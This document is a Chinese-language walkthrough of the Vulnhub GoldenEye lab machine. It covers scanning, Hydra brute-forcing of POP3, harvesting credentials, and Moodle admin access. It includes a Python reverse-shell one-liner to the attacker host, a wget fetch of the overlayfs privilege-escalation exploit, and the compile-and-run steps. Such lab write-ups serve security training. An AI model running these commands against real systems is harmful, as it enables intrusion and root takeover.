Vulnhub-(GoldenEye)
字数 1631 2025-08-11 22:57:21

GoldenEye靶机渗透测试教学文档

1. 信息收集阶段

1.1 网络扫描

  • 使用nmap扫描C段网络:
    nmap -sV 192.168.159.0/24
    
  • 排除本机IP(192.168.159.1)、网关(192.168.159.2)和Kali自身(192.168.159.131),确定靶机IP为192.168.159.154

1.2 深度扫描靶机

nmap -sS -sV -T5 -A 192.168.159.154

发现开放端口:

  • 25端口(SMTP)
  • 80端口(HTTP)

2. Web应用分析

2.1 访问80端口

  • 访问http://192.168.159.154
  • 发现一个路径,拼接访问后需要账号密码
  • 查看网页源代码,发现一个JS文件

2.2 获取凭据

  • JS文件中发现两个用户名:Boris和Natalya
  • 发现加密密码:InvincibleHack3r
  • 使用Burp Suite解码得到明文密码:InvincibleHack3r
  • 成功登录:boris/InvincibleHack3r

2.3 发现新路径

  • 访问http://192.168.159.154/sev-home/
  • 页面提示POP3服务运行在高端口

3. POP3服务渗透

3.1 扫描高端口

nmap -p- 192.168.159.154

发现两个高端口:55006和55007

3.2 识别POP3服务

nmap -sS -sV -T5 -A -p55006,55007 192.168.159.154

确认55007为POP3服务端口

3.3 暴力破解POP3

  • 创建用户名单:
    echo -e 'natalya\nboris' > wangkun.txt
    
  • 使用Hydra爆破:
    hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3
    
  • 获得凭据:
    • natalya/bird
    • boris/secret1!

3.4 查看邮件内容

使用nc连接POP3服务:

nc 192.168.159.154 55007

查看邮件发现新凭据:

  • 用户名:xenia
  • 密码:RCP90rulez!
  • 域名:severnaya-station.com
  • 网址:severnaya-station.com/gnocertdir

4. Moodle CMS渗透

4.1 添加本地hosts

gedit /etc/hosts

添加:

192.168.159.154 severnaya-station.com

4.2 访问Moodle

  • 访问http://severnaya-station.com/gnocertdir
  • 使用xenia/RCP90rulez!登录

4.3 发现新用户

在"My profile -> Messages"下发现新用户:doak

4.4 爆破doak的POP3

echo 'doak' > wangkun.txt
hydra -L wangkun.txt -P /usr/share/wordlists/fasttrack.txt 192.168.159.154 -s 55007 pop3

获得凭据:doak/goat

4.5 查看doak邮件

发现新凭据:dr_doak/4England!

4.6 发现隐藏信息

在"My private files"下发现s3crer.txt,提示访问:
http://severnaya-station.com/dir007key/for-007.jpg

4.7 分析图片

exiftool for-007.jpg
strings for-007.jpg

发现Base64编码:eFdpbnRlcjE5OTV4IQ==
解码得到:xWinter1995x!

4.8 管理员登录

使用admin/xWinter1995x!成功登录Moodle

5. 漏洞利用

5.1 Moodle 2.2.3漏洞

  • CVE-2013-3630
  • Exploit-DB编号:29324

5.2 使用MSF失败

msfconsole
search moodle
use exploit/multi/http/moodle_cmd_exec
set username admin
set password xWinter1995x!
set rhost severnaya-station.com
set targeturi /gnocertdir
set payload cmd/unix/reverse
set lhost 192.168.159.131
exploit

失败原因:需要修改执行PSpellShell

5.3 手动执行Python反向Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.159.131",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在"My profile->Blogs->Add a new entry"处执行

6. 权限提升

6.1 查看内核版本

uname -a

发现Ubuntu 3.13.0-32

6.2 搜索漏洞

  • 漏洞编号:37292
  • CVE-2015-1328 (overlayfs提权漏洞)

6.3 利用漏洞

  1. 查找exp:
    searchsploit 37292
    
  2. 复制exp:
    cp /usr/share/exploitdb/exploits/linux/local/37292.c /root
    
  3. 修改脚本:
    • 将gcc改为cc
  4. 启动HTTP服务:
    python -m SimpleHTTPServer 8081
    
  5. 靶机下载:
    wget http://192.168.159.131:8081/37292.c
    
  6. 编译执行:
    cc -o exp 37292.c
    chmod +x exp
    ./exp
    id
    

6.4 获取flag

cat /root/.flag.txt

总结

本靶场渗透测试流程:

  1. 信息收集 → 2. Web应用分析 → 3. POP3服务渗透 → 4. Moodle CMS渗透 → 5. 漏洞利用 → 6. 权限提升

关键点:

  • 注意JS文件中的隐藏信息
  • 高端口服务的识别和利用
  • 邮件内容中的敏感信息
  • 图片文件的隐写分析
  • 特定版本CMS的已知漏洞利用
  • 内核版本对应的提权漏洞
GoldenEye靶机渗透测试教学文档 1. 信息收集阶段 1.1 网络扫描 使用 nmap 扫描C段网络: 排除本机IP(192.168.159.1)、网关(192.168.159.2)和Kali自身(192.168.159.131),确定靶机IP为192.168.159.154 1.2 深度扫描靶机 发现开放端口: 25端口(SMTP) 80端口(HTTP) 2. Web应用分析 2.1 访问80端口 访问http://192.168.159.154 发现一个路径,拼接访问后需要账号密码 查看网页源代码,发现一个JS文件 2.2 获取凭据 JS文件中发现两个用户名:Boris和Natalya 发现加密密码: InvincibleHack3r 使用Burp Suite解码得到明文密码: InvincibleHack3r 成功登录:boris/InvincibleHack3r 2.3 发现新路径 访问http://192.168.159.154/sev-home/ 页面提示POP3服务运行在高端口 3. POP3服务渗透 3.1 扫描高端口 发现两个高端口:55006和55007 3.2 识别POP3服务 确认55007为POP3服务端口 3.3 暴力破解POP3 创建用户名单: 使用Hydra爆破: 获得凭据: natalya/bird boris/secret1 ! 3.4 查看邮件内容 使用nc连接POP3服务: 查看邮件发现新凭据: 用户名:xenia 密码:RCP90rulez ! 域名:severnaya-station.com 网址:severnaya-station.com/gnocertdir 4. Moodle CMS渗透 4.1 添加本地hosts 添加: 4.2 访问Moodle 访问http://severnaya-station.com/gnocertdir 使用xenia/RCP90rulez !登录 4.3 发现新用户 在"My profile -> Messages"下发现新用户:doak 4.4 爆破doak的POP3 获得凭据:doak/goat 4.5 查看doak邮件 发现新凭据:dr_ doak/4England ! 4.6 发现隐藏信息 在"My private files"下发现s3crer.txt,提示访问: http://severnaya-station.com/dir007key/for-007.jpg 4.7 分析图片 发现Base64编码:eFdpbnRlcjE5OTV4IQ== 解码得到:xWinter1995x ! 4.8 管理员登录 使用admin/xWinter1995x !成功登录Moodle 5. 漏洞利用 5.1 Moodle 2.2.3漏洞 CVE-2013-3630 Exploit-DB编号:29324 5.2 使用MSF失败 失败原因:需要修改执行PSpellShell 5.3 手动执行Python反向Shell 在"My profile->Blogs->Add a new entry"处执行 6. 权限提升 6.1 查看内核版本 发现Ubuntu 3.13.0-32 6.2 搜索漏洞 漏洞编号:37292 CVE-2015-1328 (overlayfs提权漏洞) 6.3 利用漏洞 查找exp: 复制exp: 修改脚本: 将gcc改为cc 启动HTTP服务: 靶机下载: 编译执行: 6.4 获取flag 总结 本靶场渗透测试流程: 信息收集 → 2. Web应用分析 → 3. POP3服务渗透 → 4. Moodle CMS渗透 → 5. 漏洞利用 → 6. 权限提升 关键点: 注意JS文件中的隐藏信息 高端口服务的识别和利用 邮件内容中的敏感信息 图片文件的隐写分析 特定版本CMS的已知漏洞利用 内核版本对应的提权漏洞